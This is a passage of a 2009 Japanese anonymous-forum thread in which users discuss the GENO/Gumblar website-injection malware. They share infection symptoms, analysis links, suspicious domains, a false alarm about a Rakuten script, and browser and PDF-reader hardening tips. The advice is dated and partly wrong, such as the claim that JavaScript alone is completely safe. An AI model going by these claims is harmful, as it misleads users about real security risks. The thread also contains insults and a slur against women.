493名無しさん@お腹いっぱい。:2009/05/31(日) 17:28:19
>>470
運用板見りゃいいじゃねーか
あいつのトリ検索したら発言出てくるだろ
494名無しさん@お腹いっぱい。:2009/05/31(日) 17:30:26
>>493
自分で何とかしろキチガイ
495名無しさん@お腹いっぱい。:2009/05/31(日) 17:31:04
幸せサーバープロジェクト 「アイデア・技術のある人募集中」★3
http://qb5.2ch.net/test/read.cgi/operate/1241361889/
496名無しさん@お腹いっぱい。:2009/05/31(日) 17:34:08
いちいち他のスレの書き込みまで覗いて叩こうとするのはよくないと思う。
今は大人しいんだから放っておきなよ。
497名無しさん@お腹いっぱい。:2009/05/31(日) 17:45:03
>>484
自分のサイトじゃないの?
エスパーじゃないんだから440自身が説明できない現象じゃ
どうしようもないよ
498名無しさん@お腹いっぱい。:2009/05/31(日) 17:55:02
XcxlmnqGqU
499名無しさん@お腹いっぱい。:2009/05/31(日) 18:10:08
運営スレであんだけファビョって
インターネット板とセキュ板のテンプレ勝手に変えて新スレたてて
今度は何をしてくれるのかな
500名無しさん@お腹いっぱい。:2009/05/31(日) 18:28:55
この粘着って、自分が気に入らない事した奴が
ほかの奴らに自分以上に構ってもらえてるのが羨ましくてしょうがないんだろうなwwww
501名無しさん@お腹いっぱい。:2009/05/31(日) 18:30:38
>>406
コレ本人だったのかドン引き
502名無しさん@お腹いっぱい。:2009/05/31(日) 18:47:19
9.1.0では駄目の記述さっさと直せよ
亜種がどうこうで結果的に正しいからいいとかいうなら
技術者の資格ないしさっさとやめて
ゲーム脳とか水結晶でも信仰してろ
503名無しさん@お腹いっぱい。:2009/05/31(日) 19:03:10
ttp://www.ipa.go.jp/security/announce/alert.html
亜種が怖いからここの脆弱性の対策は全部しとくべきですね
504名無しさん@お腹いっぱい。:2009/05/31(日) 19:20:29
cccクリーナーとか勘弁してほしいがな
505名無しさん@お腹いっぱい。:2009/05/31(日) 20:13:41
>>499
運用板でのことは本当にアレだけど
テンプレ変えた奴は別じゃないのかね。
そこまでわかりやすいことしたら叩かれるのは目に見えてる。
506名無しさん@お腹いっぱい。:2009/05/31(日) 20:16:02
だからもういいってば
もうスレに来ないだろうしわざわざ話題にすることでもないだろ
話題にすればまた荒らすからやめとけ
507名無しさん@お腹いっぱい。:2009/05/31(日) 20:16:10
利するのはヤツしかおらんし
コレまでの言動見てると叩かれてもヤル子よ彼は
508名無しさん@お腹いっぱい。:2009/05/31(日) 20:16:58
テンプレ外したらな
509名無しさん@お腹いっぱい。:2009/05/31(日) 20:20:48
チェッカー様の話題になると荒らしとセキュ板叩きが来るんだよ
なんかの偶然かな
510名無しさん@お腹いっぱい。:2009/05/31(日) 20:21:18
とにかく新スレをたてるんやー
そしてシンテンプレにするんやで
511名無しさん@お腹いっぱい。:2009/05/31(日) 20:23:05
8%でまあまあ危険ってなんだよ
ろくでもないコメントどうにかしろ
512名無しさん@お腹いっぱい。:2009/05/31(日) 20:23:53
荒らしとセキュ板叩きってどれのことかしら
513名無しさん@お腹いっぱい。:2009/05/31(日) 20:25:35
>>512
だいぶ前に見たわ。
セキュ板の民度が低くて話にならないだとか何回も書いてた
514名無しさん@お腹いっぱい。:2009/05/31(日) 20:26:51
チェッカーの話はやめよう。
余計なこと話したらまた文句言われる。
515名無しさん@お腹いっぱい。:2009/05/31(日) 20:27:43
クソサイトの話はやめよう
516名無しさん@お腹いっぱい。:2009/05/31(日) 20:30:08
初心者は使わないほうがいい
全部危険とか言い出すし
517名無しさん@お腹いっぱい。:2009/05/31(日) 20:45:57
初心者だから使うんだろ
518名無しさん@お腹いっぱい。:2009/05/31(日) 20:48:06
いいえ
519名無しさん@お腹いっぱい。:2009/05/31(日) 20:51:41
はい
520名無しさん@お腹いっぱい。:2009/05/31(日) 20:52:14
GENOチェッカーで危険と出たのでもう見にきません
521名無しさん@お腹いっぱい。:2009/05/31(日) 20:53:18
【つこうた】NECネッツエ○アイ株式会社員がつこうた【盗撮魔人】 ★2
http://tsushima.2ch.net/test/read.cgi/news/1243770160/
522名無しさん@お腹いっぱい。:2009/05/31(日) 22:23:45
ウイルス収まった??
801連中しかしらないサイトだし、どうなったかッわかりづらいな
523名無しさん@お腹いっぱい。:2009/05/31(日) 22:26:17
http://www.vector.co.jp/soft/dl/winnt/util/se446336.html

VECTORからフリーソフト落とそうとしたら警告されるんだが大丈夫?
524名無しさん@お腹いっぱい。:2009/05/31(日) 22:29:25
ココそういうスレじゃねえから
525名無しさん@お腹いっぱい。:2009/05/31(日) 23:15:57
>>456-457
ID出す話でも そうだけど、こういう話になると、
いつもタイミングよく、直後に否定のレスが付くね。
526名無しさん@お腹いっぱい。:2009/05/31(日) 23:20:01
ココそういうスレじゃねえから
527名無しさん@お腹いっぱい。:2009/05/31(日) 23:22:34
>>525
かいたやつがびびってるんだろな
528名無しさん@お腹いっぱい。:2009/05/31(日) 23:25:26
テンプレは直さないほうがいい!
荒れるぞ
529名無しさん@お腹いっぱい。:2009/05/31(日) 23:26:01
直さないと荒れるワ
530名無しさん@お腹いっぱい。:2009/06/01(月) 00:04:45
>>527
気のせいかな。今度は都合の悪いレス
流そうとしてるように見えるんだけど。
531名無しさん@お腹いっぱい。:2009/06/01(月) 00:06:18
そのトーリ
532名無しさん@お腹いっぱい。:2009/06/01(月) 00:07:17
全部通報せえやハゲ
533名無しさん@お腹いっぱい。:2009/06/01(月) 00:09:16
詰めが甘いスレだ
534名無しさん@お腹いっぱい。:2009/06/01(月) 00:18:22
>>532
             /)
           ///)
          /,.=゙''"/
   /     i f ,.r='"-‐'つ____   こまけぇからハゲるんだよ
  /      /   _,.-‐'~/⌒  ⌒\
    /   ,i   ,二ニ⊃( ●). (●)\
   /    ノ    il゙フ::::::⌒(__人__)⌒::::: \
      ,イ「ト、  ,!,!|     |r┬-|     |
     / iトヾヽ_/ィ"\      `ー'´     /
535名無しさん@お腹いっぱい。:2009/06/01(月) 00:19:19
AV入れてみたが思ったよりも軽くて予想外。
ちゃんとスキャンしてるのか試しに鑑定すれからGENOウイルスをダウンロードしたけど。
全て検知した。
536名無しさん@お腹いっぱい。:2009/06/01(月) 00:20:59
>>535
スキャンが重い。今、床ピタン焼肉で盛り上がって保健所にメールしてるけど
時期が悪かったら感染しまくりだったんでは・・・・
537535:2009/06/01(月) 00:22:05
535は誤爆です。すんません。汁。
538名無しさん@お腹いっぱい。:2009/06/01(月) 01:12:07
テンプレとかどうでもいいっしょ
もうGENOウィルスなんて引っかかる奴いないし
539名無しさん@お腹いっぱい。:2009/06/01(月) 01:15:06
じゃあこのスレでオワリな
540名無しさん@お腹いっぱい。:2009/06/01(月) 01:18:39
>>538
どうでも良くないから話題にでるんだろ。

>もうGENOウィルスなんて引っかかる奴いないし
そう思うならこのスレにくんなよw
541名無しさん@お腹いっぱい。:2009/06/01(月) 03:42:50
今は危険性無いんだろ?
542名無しさん@お腹いっぱい。:2009/06/01(月) 04:20:23
腐女子に隠蔽されて状況がわからなかったな
視ね腐れ女ども
543名無しさん@お腹いっぱい。:2009/06/01(月) 04:49:27
亜種って言っても報告は無いんだろ?
544名無しさん@お腹いっぱい。:2009/06/01(月) 06:57:16
>>543
亜種だらけだったから、各ベンダーのシグネチャが遅れまくったんじゃないか。
本体の配布が止まってしまったから、どれくらいの亜種がカバーされてるのか
よくわからないし、感染放置されているサイトがいきなり活動を再開する
可能性もある。
545名無しさん@お腹いっぱい。:2009/06/01(月) 07:04:28
>>544
何を言っているのかわからない・・・
546名無しさん@お腹いっぱい。:2009/06/01(月) 07:48:52
GENOウイルスと他のウイルスの違いは何?
547名無しさん@お腹いっぱい。:2009/06/01(月) 08:15:21
>>545
俺はわかるが。
548名無しさん@お腹いっぱい。:2009/06/01(月) 08:49:54
もうスレ立てるとかとんでもねえなあ
549名無しさん@お腹いっぱい。:2009/06/01(月) 08:51:16
テンプレもアフィサイト準拠にわざわざ直しとる…
550名無しさん@お腹いっぱい。:2009/06/01(月) 09:17:27
落ちるまで放置でいいんじゃね?>アフィ準拠

必要なら、アフィチェッカー入ってないスレ立ててそっち利用すればいいよ。
551名無しさん@お腹いっぱい。:2009/06/01(月) 09:25:56
次スレワロチww

チェッカ信者が立てやがったww


アンチチェッカ派が立てるに40ペリカかけてたんだがなあ…
552名無しさん@お腹いっぱい。:2009/06/01(月) 09:54:14
次は19の1にもどしてね
なんでwikiとか外されてんのよ
・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD

感染が疑わしい人は迷わずクリーンインストール推奨です。
★Anubisレポート
http://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html

★GENOウイルスまとめ
http://www29.atwiki.jp/geno/
553名無しさん@お腹いっぱい。:2009/06/01(月) 12:05:04
短縮URLが判る方法ない?

【MHP2G】モンスターハンターポータブル2ndG HR341
http://jfk.2ch.net/test/read.cgi/handygame/1243680693/

の下の方に出てるURL踏んでも何も表示されないから怖いんだが
554名無しさん@お腹いっぱい。:2009/06/01(月) 12:14:27
質問スレ池カス
555名無しさん@お腹いっぱい。:2009/06/01(月) 13:45:50
553-554
556名無しさん@お腹いっぱい。:2009/06/01(月) 13:48:24
553ー55449
557名無しさん@お腹いっぱい。:2009/06/01(月) 14:45:49
何だかジーンズの型番みたいだな
558名無しさん@お腹いっぱい。:2009/06/01(月) 16:48:52
>>548
スレ立て乙。
559名無しさん@お腹いっぱい。:2009/06/01(月) 17:09:52
はあ
560名無しさん@お腹いっぱい。:2009/06/01(月) 17:26:22
新たな「Webウイルス」出現、2万件以上の正規サイトに埋め込まれる
「Glumbler」ウイルスとは別物、対策ソフトを使っていても被害の恐れ
http://itpro.nikkeibp.co.jp/article/NEWS/20090601/331097/

さて、どっかサンプルサイトないだろうかw
561名無しさん@お腹いっぱい。:2009/06/01(月) 17:31:05
んもー、改ざんされるような管理なら公開するなよ!!
562名無しさん@お腹いっぱい。:2009/06/01(月) 17:32:04
何のソフトの脆弱性つくか書いてないのか
563名無しさん@お腹いっぱい。:2009/06/01(月) 17:36:34
未対策の脆弱性突かれたら終わりだな
564名無しさん@お腹いっぱい。:2009/06/01(月) 17:37:52
>>562
元記事にも書いてない。
google-analytics.comに似た名前のドメインに誘導するってことくらいしか
わからん。
565名無しさん@お腹いっぱい。:2009/06/01(月) 17:47:25
ウイルス対策ソフトのことかよ
566名無しさん@お腹いっぱい。:2009/06/01(月) 17:52:35
任意のコードを実行できるVMwareの脆弱性について報告
ttp://www.nri-secure.co.jp/ncsirt/2009/0421_1.html
567名無しさん@お腹いっぱい。:2009/06/01(月) 18:36:35
もし かも 多分 
568名無しさん@お腹いっぱい。:2009/06/01(月) 18:57:50
>>560
何気にバスターが検出してるな
569名無しさん@お腹いっぱい。:2009/06/01(月) 19:19:30
しかし、このトロイの木馬を埋め込むことによって、誰が得をするの?
ウイルスなら愉快犯もあるだろうが、データ送信してる今回の奴とかなら、その線から吊し上げたほうがいいんでね?
570名無しさん@お腹いっぱい。:2009/06/01(月) 19:30:39
>>568
ノートン、カスペル先生は?
571名無しさん@お腹いっぱい。:2009/06/01(月) 19:35:13
してません
572名無しさん@お腹いっぱい。:2009/06/01(月) 19:35:48
ざんねんだったな
573名無しさん@お腹いっぱい。:2009/06/01(月) 19:41:50
>>570
守ってくれる!

と強く念じる心があれば・・・
574名無しさん@お腹いっぱい。:2009/06/01(月) 20:19:23
575名無しさん@お腹いっぱい。:2009/06/01(月) 21:05:46 BE:795205038-2BP(0)
常駐先は、.../winlogon/Notify 本体はDLL
データが、HKLM/Software/MSSMGR にできるらしい

Quick Time も攻撃対象に入っている ただし、最新の脆弱点が突かれているかは調べてない

http://www.virustotal.com/jp/analisis/57c3582fa2f1c55fd9cde79bb02138529a6b6f0351cb5c49a69ad2ae6c19c6ec-1243856883
※入手経路情報が書き込まれている可能性: ハッシュは一致しません
576名無しさん@お腹いっぱい。:2009/06/02(火) 00:35:28
>32
これって、Windows2000でもいけるの?
577名無しさん@お腹いっぱい。:2009/06/02(火) 00:41:20
>>32
>>60 本物
578名無しさん@お腹いっぱい。:2009/06/02(火) 01:17:39
楽天のトップページにある「激安1本当り23円から」の
リンクをクリックすると、PG2で「GENO」がブロックされる。
まさかと思いソースチェッカーで確認したら、
このページに埋め込まれたJS内に
「unescape」「eval」「replace」の3つを発見。

ここのURLは貼らないほうがいいっすよね?
他にも楽天の爽快ドラッグが感染している模様。
もしかして他にも楽天内で感染してるショップが
たくさんあるんじゃないかこれ。
579名無しさん@お腹いっぱい。:2009/06/02(火) 01:19:38
というかどちらも同じ外部JSファイルを使用しているので、
楽天全般の問題?
580名無しさん@お腹いっぱい。:2009/06/02(火) 01:22:18
マジか?
581名無しさん@お腹いっぱい。:2009/06/02(火) 01:26:03
自分がチェックに使ったのはここ
ttp://so.7walker.net/guide.php

ためしに楽天の爽快ドラッグのURLをチェックしてみてほしい。
「s_code.js」の中に以下の結果がでるよ。

「注意!ループタグを発見! (1)
危険!無限ループを発見! (1)」
582名無しさん@お腹いっぱい。:2009/06/02(火) 01:34:20
誤爆じゃないのか?
s_code.jsには確かにunescape、eval、replaceが含まれているけど
GENOじゃない
583名無しさん@お腹いっぱい。:2009/06/02(火) 01:34:55
・激安23円
・総会ドラッグ

確かにunescape等はあるが
ソース見たかぎり特に異常は無いが?
584名無しさん@お腹いっぱい。:2009/06/02(火) 01:37:13
>>582
うん、GENOでもないし、ヤバいスクリプトでもないね。
unescapeもevalもreplaceも文字列を評価して置き換えたりする場合に
普通に使う関数だから、これらが入っていたらGENOだ、っていうのは
乱暴すぎる。
585578:2009/06/02(火) 01:39:09
「unescape」「eval」「replace」があっても大丈夫なのか…。
JavaScriptにはうとかったもので、つい驚いてしまった。
あからさまに怪しげなソースになってない限りは大丈夫そうなんですね。

っていうか他の店で買い物した直後にこれ見つけたんで、
てんぱってしまった。お騒がせしました。
586名無しさん@お腹いっぱい。:2009/06/02(火) 01:40:51
でも楽天の店舗の一つも確か感染例があったと思うから注意するのは良い事
587名無しさん@お腹いっぱい。:2009/06/02(火) 01:47:22
>リンクをクリックすると、PG2で「GENO」がブロックされる。

ここが少し気になるな
PG2が反応するって事=GENOの該当IPに反応って事だからな
588名無しさん@お腹いっぱい。:2009/06/02(火) 01:47:27
「Gumblar」攻撃、いまだに沈静化せず--ScanSafe報告
ttp://japan.zdnet.com/news/sec/story/0,2000056194,20394092,00.htm
589名無しさん@お腹いっぱい。:2009/06/02(火) 01:48:38
ガンブラさんより、>>560の方が気になって仕方ない
590名無しさん@お腹いっぱい。:2009/06/02(火) 02:04:18
>>587
http://www.omniture.com
と、omniture.comの管理下のサイトのリソースを利用している。
PG2で66.235.128.0 - 66.235.159.255あたりをブロックしてると
引っかかると思うけど、どういうルール使ってるのかも知らんし、
PG2自体使ったこともないから、よくわからんな。
591名無しさん@お腹いっぱい。:2009/06/02(火) 02:10:09
>>578
反応したアドレスを貼ってくれ
592581:2009/06/02(火) 03:03:02
>>590
自分の使用しているGENO系リストはここでもらったものです。
ルールとかは自分もよくわからないので何とも。
ttp://pc11.2ch.net/test/read.cgi/sec/1228949365/328

>>578
URLむちゃくちゃ長くて直接貼るのはちょっとあれなんで…
ttp://www.rakuten.co.jp/

ここの「激安1本当り23円から」のリンク先です。
とりあえず楽天のトップではPG2も反応しない。
593名無しさん@お腹いっぱい。:2009/06/02(火) 03:26:31
>>592
PG2ってどのIPをブロックしたとかいう情報はログに残らないの?
ソース見た限りじゃ問題なさそう。埋め込みのjsも外部jsも変なところは
ない。
Firefoxの先読み機能が有効だとリンク先に潜んでるのかもしれないけど、
そこまでチェックするのは面倒くさい。
594名無しさん@お腹いっぱい。:2009/06/02(火) 03:55:50
>>592
この際、PG2導入して試してみるからそのリストupしてみて
mediafireは踏みたくない
595581:2009/06/02(火) 03:57:48
>>593
ブロックされたGENOのIPは全部同じ、楽天の202.72.52.16。
これと一緒に443ポートから以下へのアクセスもブロックされてました。
Archer Communications 66.235.139.118

これは自分が楽天で買い物していた間の記録のようで、
>>578に気づいて以降の記録では、何度か楽天のサイトにアクセスしても
上記二つのIPは80ポートのみブロックされてました。

>>594
うpはOKです。安全なうpろだというか、
オススメのところありましたら教えてもらえますか?
596名無しさん@お腹いっぱい。:2009/06/02(火) 04:06:29
>>595
じゃあ、↓から適当な板選んで
ttp://www.axfc.net/uploader/#x2
597581:2009/06/02(火) 04:13:22
うpしました。DLパスは581です。
ttp://www1.axfc.net/uploader/File/so/24547

ついでなので、自分が所有しているリスト全部いれました。
使用しているウイルス関係はこのZIPの中身のみです。
598名無しさん@お腹いっぱい。:2009/06/02(火) 05:14:09
素人目に少し調べてみたんだが特に異常は見当たらず
詳しい人のレスを待て
どっちにしても楽天は昔から裏で何をやっているか分からない企業なので買い物は勧められないな
599名無しさん@お腹いっぱい。:2009/06/02(火) 05:31:22
>>597
mediadefenderでadobeのリスト配ってるものだが
そういう配り方辞めてくれないか?いいかげんウザくて仕方ねぇ
どうしても同梱させたいなら何があっても絶対に消されないうpロダにうpしろ
600名無しさん@お腹いっぱい。:2009/06/02(火) 05:37:56
>>583
同じくソース見る限り、問題なさそうではあるが・・・
601名無しさん@お腹いっぱい。:2009/06/02(火) 05:57:43
アフィチェッカーで20%とか出たから大騒ぎしてるのか?
602名無しさん@お腹いっぱい。:2009/06/02(火) 06:05:14
普通に使う関数に大騒ぎ
603名無しさん@お腹いっぱい。:2009/06/02(火) 06:46:17
evalとunescape同時に使うさいとは例外なくゴミ
604名無しさん@お腹いっぱい。:2009/06/02(火) 10:30:03
スポーツ専門チャンネルのWebサイトが改ざん被害
http://is702.jp/news/574/

これもGENO?
605名無しさん@お腹いっぱい。:2009/06/02(火) 12:54:32
世界2000サイトが改ざん被害、新手の悪質コードで攻撃か
ttp://www.itmedia.co.jp/enterprise/articles/0906/02/news024.html

こんな話もでてきているようですな
606名無しさん@お腹いっぱい。:2009/06/02(火) 13:00:36
607名無しさん@お腹いっぱい。:2009/06/02(火) 13:04:09
>>605
ITMediaでも「GENOウイルス」って呼ばれてるのかw
608名無しさん@お腹いっぱい。:2009/06/02(火) 13:09:32
2ちゃんの力も馬鹿に出来ないな
まじで
609名無しさん@お腹いっぱい。:2009/06/02(火) 13:14:44
www.gocebit・com.au<suspicious>
www.mycebit・com.au/rego09/  <suspicious>
610名無しさん@お腹いっぱい。:2009/06/02(火) 15:38:06 BE:1590408386-2BP(0)
>>608
被害者に2ちゃんねらーが多かったということかと
これが、被害者におばちゃんが多いようなウイルスだったら、また違ったw
611名無しさん@お腹いっぱい。:2009/06/02(火) 16:49:48
websenseの記事にあるスクショによると
新型?のは</body>タグの後にながーいjsスクリプトでいいのかな
612名無しさん@お腹いっぱい。:2009/06/02(火) 17:30:15
既出かもしれんが、感染したPCのsqlsodbc.chmを開いてみた。

FTPのホスト名・ログイン名・パスワードが記録されてた。ただし前後リバースされて。
613名無しさん@お腹いっぱい。:2009/06/02(火) 18:28:16
>>612
一件だけ報告があったけど重ねて情報あれば助かるよ
仮想だとその辺がうまく動作しなくて確認できないから貴重
614名無しさん@お腹いっぱい。:2009/06/02(火) 19:21:04
>>613
ありがとう。
追記になるけど、リバースされて記録されたのはgumblarが流行った頃に感染したPC。
もっと以前、初期のzlkon(GENO)流行時に感染したPCのは完全にイミフな文字列でした。
615名無しさん@お腹いっぱい。:2009/06/03(水) 00:36:11
>>613
俺もVMに感染させたけど、最初に改変された状態のままで、ftpサーバに接続
しても内容が書き換わらなかった。
やはり、仮想PC回避コードが入ってるのかね?
616名無しさん@お腹いっぱい。:2009/06/03(水) 01:00:02
ハッシュ確認しようと思ったんだけど
ハッシュチェッカーってexeに直接ファイルをドラッグ&ドロップさせても問題ないのかな?
617名無しさん@お腹いっぱい。:2009/06/03(水) 01:57:15
>>615
いや、正確なプロセスの位置を探せないんだよ仮想だと
618名無しさん@お腹いっぱい。:2009/06/03(水) 04:27:27
単なる四月馬鹿のネタなのにw
619名無しさん@お腹いっぱい。:2009/06/03(水) 04:38:19
今パソコンつけたら青い画面に英語で何か書いてある…パソコン動かない。avast入れてadobe reader、FLASH共に最新だったのに。昨日itune最新版更新したんだがこれが原因なのか?
620名無しさん@お腹いっぱい。:2009/06/03(水) 05:01:05
何か書いてあるんなら、何が書いてあるのか書けよバカ
621名無しさん@お腹いっぱい。:2009/06/03(水) 05:43:13
だいたいスレ違いだろ
622名無しさん@お腹いっぱい。:2009/06/03(水) 06:08:11
>>619です。スレ違いすみませんでした。
623名無しさん@お腹いっぱい。:2009/06/03(水) 10:02:31
ところでバスターはもう対応済みなのかね?
624名無しさん@お腹いっぱい。:2009/06/03(水) 11:09:57
>>617
それはないと思うけどなぁ。
プロセス間通信がまともにできなかったら、正規のアプリですら誤動作する。
625名無しさん@お腹いっぱい。:2009/06/03(水) 12:00:08
なんで正規のアプリと一緒にしちゃうの
626名無しさん@お腹いっぱい。:2009/06/03(水) 12:00:57
プロセスってかサービス関連が特殊だからだろ
627名無しさん@お腹いっぱい。:2009/06/03(水) 12:24:17
そんなに特殊でもないけどな。
628名無しさん@お腹いっぱい。:2009/06/03(水) 15:54:31
ただでさえクソ重いpdfファイルにウイルスまで仕込まれた新種登場 名実共に誰も開かないゴミ拡張子へ
http://tsushima.2ch.net/test/read.cgi/news/1243985189/

GENOじゃないがほんとpdf駄目だな
629名無しさん@お腹いっぱい。:2009/06/03(水) 17:29:11
現時点で対応してるウイルス対策ソフトって何々あるの?
630名無しさん@お腹いっぱい。:2009/06/03(水) 20:22:04
Masuzoe
631名無しさん@お腹いっぱい。:2009/06/04(木) 07:58:33
脆弱性の部分をアップデートしておけばGENOタイプは滅多なことじゃ感染しない
ウィルス対策ソフトに頼る前にそっちからやっていこうぜ
632名無しさん@お腹いっぱい。:2009/06/04(木) 09:24:24
高度化するPDF悪用の攻撃、回避するポイントは?
ttp://www.itmedia.co.jp/enterprise/articles/0906/04/news019.html
633名無しさん@お腹いっぱい。:2009/06/04(木) 10:05:59
このウイルスってwindows95、98とかでも感染するの?
634名無しさん@お腹いっぱい。:2009/06/04(木) 10:31:49
どこに巣食うかによる
635名無しさん@お腹いっぱい。:2009/06/04(木) 13:20:52
>>631のようにゼロデイアタックを知らずに、脆弱性を塞いでおけば
ウイルス対策なんかいい加減で好みのものを使えばいい、あるいは
なくてもOKと思っているそんな奴に限って知らぬ間にPCを乗っ
取られるんだぜwww

だが脆弱性もチェックしてくれる高検知率のカスペなら安心だな
636名無しさん@お腹いっぱい。:2009/06/04(木) 13:22:32
ほらな[age]だろ
637名無しさん@お腹いっぱい。:2009/06/04(木) 13:32:33
>>635
釣りのようだ

マジなら支離滅裂な思考について行けないな
638名無しさん@お腹いっぱい。:2009/06/04(木) 13:35:49
民剤でらりってるんだろ
639名無しさん@お腹いっぱい。:2009/06/04(木) 14:19:46
foxitに乗り換えてスクリプトを無効にすればまずPDF関係の感染は解消されると思う。
起動もadobeより速いし、無料版でも広告を消せるし、
マルチリンガルだし、アクチベーションが何とかって喧しく言われないし
640名無しさん@お腹いっぱい。:2009/06/04(木) 14:22:03
んなことはこのスレにいる誰でも知ってる
641名無しさん@お腹いっぱい。:2009/06/04(木) 14:40:52
それを踏まえて定期的に書く事に意味があるのだよ。
そもそもadobe製品にはロクなものが無いから・・・
642名無しさん@お腹いっぱい。:2009/06/04(木) 15:19:25
>>639
OPERAも[pdf]の関連付け外せば自動実行されね-ぞ
表示は速いし
広告は初めからないし
スクリプトもページごとに設定可能だし
643名無しさん@お腹いっぱい。:2009/06/04(木) 16:04:32
flashは使ってるくせに
644名無しさん@お腹いっぱい。:2009/06/04(木) 16:08:55
FLASHは基本外してる。
必要のないところで使う必要もないし。
645名無しさん@お腹いっぱい。:2009/06/04(木) 16:19:55
そうだね、Opera最強伝説だね
646名無しさん@お腹いっぱい。:2009/06/04(木) 16:25:44
★同人新スレにアフィが追加されました!

【報告専用】同人サイト向け・GENOウィルス注意11
http://changi.2ch.net/test/read.cgi/doujin/1244096936/
647名無しさん@お腹いっぱい。:2009/06/04(木) 16:26:25
いや、最強かどうかは知らんが
FireFoxだけ利用者が増えると
ターゲットがIEから火狐に移るだけだろ?

色々有るから、設定方法も知って使って欲しいだけ
648名無しさん@お腹いっぱい。:2009/06/04(木) 16:34:53
最新版にしてリーダはスクリプト無効にしときゃ平気
649名無しさん@お腹いっぱい。:2009/06/04(木) 16:35:28
前からあっただろw
必死ダナーwwwwwwwwww
650名無しさん@お腹いっぱい。:2009/06/04(木) 16:36:54
火狐に関してはnoscript導入が当然のようになっているが
RequestPolicyや他のアドオンの組み合わせでもセーフな気がする
651名無しさん@お腹いっぱい。:2009/06/04(木) 16:38:43
しらん
652名無しさん@お腹いっぱい。:2009/06/04(木) 16:39:53
絶対なんていってないだろ
比較的操作設定が容易で利用者が多いから勧められてるだけかと
653名無しさん@お腹いっぱい。:2009/06/04(木) 16:41:21
ブラウザ戦争しろ
654名無しさん@お腹いっぱい。:2009/06/04(木) 16:41:24
突っ込み病患者に優しくしてあげてください
655名無しさん@お腹いっぱい。:2009/06/04(木) 16:41:43
NOSCRIPTは確かにめんどくさい
USの方のアドオンサイトに行けば割と掘り出し物があるからお勧めする
656名無しさん@お腹いっぱい。:2009/06/04(木) 16:44:38
スクリプト無効なんてやってられるか
脆弱性の対策しときゃ大丈夫だ
657名無しさん@お腹いっぱい。:2009/06/04(木) 16:52:38
それが>>656の最後の言葉であった
658名無しさん@お腹いっぱい。:2009/06/04(木) 16:54:57
スクリプトなんか切る奴は情弱って言ってる人もいるんだけど
何もわからない本物の情弱ははっきりしないことはとりあえず念入りにしときます
659名無しさん@お腹いっぱい。:2009/06/04(木) 16:57:09
全く安全
多くのウイルスがJavaScriptを介して、pdf、swf等を読み込ませるからJavaScriptが問題だと勘違いされがちですが、
javascript単体にはローカルファイル操作、レジストリ改変等を行う機能は存在しません
よってその対処法を導入していれば持続的な被害に合うことは一切ありません




>>657,658
雑魚は黙ってなさい
660名無しさん@お腹いっぱい。:2009/06/04(木) 16:57:20
まぁ、GENO亜種や非ガンブラー系の対策としてJS切っておくのは間違いではないな
もう、普通のGENOの時代は終わった
っていうか、ただの氷山の一角に過ぎない
本当の地獄はこれから
661名無しさん@お腹いっぱい。:2009/06/04(木) 16:58:47
IDの出ないスレだと強気だな(`・ω・´)
662名無しさん@お腹いっぱい。:2009/06/04(木) 16:59:40
念のために言っておくと・・>>1-661のレスは俺一人の自演だから
663名無しさん@お腹いっぱい。:2009/06/04(木) 17:01:10
>>659
アフィ管理人きたー!
↓これ直さないの?ねぇねぇ直さないの?

■ adobe readerを9.1.1にアップデートする(9.1:9.1.0では駄目)
664名無しさん@お腹いっぱい。:2009/06/04(木) 17:02:20
>>659
強気あなたかっこいいです
665659:2009/06/04(木) 17:03:20
かんりにんじゃないよ
666名無しさん@お腹いっぱい。:2009/06/04(木) 17:05:10
トリップつけるでしょ
>>406
667名無しさん@お腹いっぱい。:2009/06/04(木) 17:07:14
ドーデもいいから同人板で語ってくれ
668名無しさん@お腹いっぱい。:2009/06/04(木) 17:27:55
>>655
よそのアドオンもいいですが、たまには、ぬりかべのことも思い出してあげてください。
669名無しさん@お腹いっぱい。:2009/06/04(木) 17:28:53
670629:2009/06/04(木) 17:30:24
>>631
とりあえず、アップデートはまめにしてるんだけど、ちょっと心配だったから聞いてみたんだ。
レスありがとう
671名無しさん@お腹いっぱい。:2009/06/04(木) 17:35:40
>>669
なにこれこΠ
672名無しさん@お腹いっぱい。:2009/06/04(木) 17:45:00
円周率もしらないのか
673672:2009/06/04(木) 17:45:42
吊ってくる
674名無しさん@お腹いっぱい。:2009/06/04(木) 18:01:06
>>672
>>673がなかったら気がつかなかったよ。
ありがとう。だから、イ`。
675名無しさん@お腹いっぱい。:2009/06/04(木) 18:20:45
チェッカーで調べたらamazonが10%で少し危険ってあったけど
これは既出なの?
それとも10%くらいじゃみんな気にしないのか
676名無しさん@お腹いっぱい。:2009/06/04(木) 18:22:56
99%でも気にしない
677名無しさん@お腹いっぱい。:2009/06/04(木) 18:23:04
>>675
そもそもチェッカーは当てにならないし

てかTOPの書いてあるのちゃんと読もうよ
678名無しさん@お腹いっぱい。:2009/06/04(木) 18:23:26
100%になったらまたきてね
679名無しさん@お腹いっぱい。:2009/06/04(木) 19:01:31
1000%になったらうちに来ていいよ
680名無しさん@お腹いっぱい。:2009/06/04(木) 19:49:18
なんか伸びてると思ったら…なんのこっちゃw
681名無しさん@お腹いっぱい。:2009/06/04(木) 19:54:39
うちのサイト、今までチェッカーで1000%だったんだけどさっき調べたら100%まで落ちてたww
682名無しさん@お腹いっぱい。:2009/06/04(木) 20:01:33
ちぇっかーw
683名無しさん@お腹いっぱい。:2009/06/04(木) 20:03:25
チェッカーはかなり前に100%制に改定されてるだろ
どっちにしろ、信用は出来んが
684名無しさん@お腹いっぱい。:2009/06/04(木) 23:38:24
君は1000%〜♪
685名無しさん@お腹いっぱい。:2009/06/05(金) 00:01:44
>>642
勘違いしてるようだがfoxitはPDFリーダでWebブラウザじゃないぞ。
686名無しさん@お腹いっぱい。:2009/06/05(金) 00:06:54
>>659
javascript単体でどうこうするウィルスは確かにほとんど居ないが、脆弱性自体はあるし、あった。
ウィルスではないが、XSSなどはjavascript経由で発症する物がほとんどであるし、切る事で安全性は確実に高まります。

「自分の持つシステムのパスワードを全部統一していてもどれかが洩れない限りは安全ですが洩れたときのことを考えてばらつかせる方が安全です」
